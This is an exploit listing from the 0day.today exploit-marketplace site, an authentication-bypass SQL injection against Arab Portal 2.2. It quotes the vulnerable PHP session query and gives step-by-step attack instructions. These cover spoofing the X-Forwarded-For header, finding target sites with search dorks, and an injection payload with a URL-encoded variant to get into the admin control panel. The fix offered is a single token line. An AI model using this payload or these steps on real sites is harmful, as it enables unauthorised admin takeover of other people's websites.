0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Arab Portal 2.2 (Auth Bypass) Remote SQL Injection Vulnerability
[================================================================
Arab Portal 2.2 (Auth Bypass) Remote SQL Injection Vulnerability
================================================================
# Script Name : Arab portal 2.2 Remote Auth SQL Bypass Vulnerabilitiy
# Script home : http://www.arab-portal.info/arabportal_22.zip
# Exploit risk level : High
# Written By : Sniper Code [S.C.T - 443 ]
+======================================================================================================================+
# Introduction About Vulne :
the Control Panel Is Depending on Session In MySQL Also By Cookies But by Default it Is Session ...
See This Line 192 of this File [admin/aclass/admin_func.php]:
$result = $apt->query("SELECT sessIP from rafia_admin_sess where sessID='$sessID' and sessIP='$sessIP' and sess_TIME<'$expsess'");
When You Injected The Header To Get XPL SQL Injection By Simple Injected And Success The Login In This SQL Query
# Vulne Line 192 In File [admin/aclass/admin_func.php]: :
function is_login()
{
global $apt;
$sessID = $this->get_sessID();
$sessIP = $apt->ip;
$expsess = $apt->time + $this->expsess;
if($this->use_pre_ip == 1){$r_ip = explode('.',$sessIP); $sessIP = $r_ip[0].'.'.$r_ip[1].'.'.$r_ip[2];}
$result = $apt->query("SELECT sessIP from rafia_admin_sess where sessID='$sessID' and sessIP='$sessIP' and sess_TIME<'$expsess'");
if ($apt->dbnumrows($result) > 0)
{
$apt->query("update rafia_admin_sess set sess_TIME='".$apt->time."' where sessID='$sessID'");
return true;
}
else
{
return false;
}
}
we can exploit this . .
# and now the Exploit is:
-First : Install This Tool :
https://addons.mozilla.org/en-US/firefox/addon/5948
it is [ X-Forwarded-For Spoofer tool]
You Can Inject Also Client-ip Also Is Infected In Header
-second : find site by using dork : plz use your mind ^_^
ok now Go To Admincp e.g. :
http://localhost/arabportal_22/admin/
http://sniper code/path/admin/
Then Write This Code In Tool [from Firefox ===> Tools====> X-Forwarded-for Spoofer]
put this code :
'/**/union/**/select/**/0/*
And select Enable for tool . . .
Now Refresh Twice ..and you will be In admin Control Panel ^_^
I Am Tired For Written Exploit For This Bug ...
and You Can Code It,s . .
If You Have Problem With Magic_quat in php version Encode To URL Like This :
%27%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%30%2F%2A
and also you will be in admin control panel. . . .
+================================================================================================================+
# Solution :
Protect The Admin cp By using Firewall Or Change The Login Manner :)
thats it . . .
[+]
done by :sniper code and rxh . .
# 0day.today [2024-10-05] #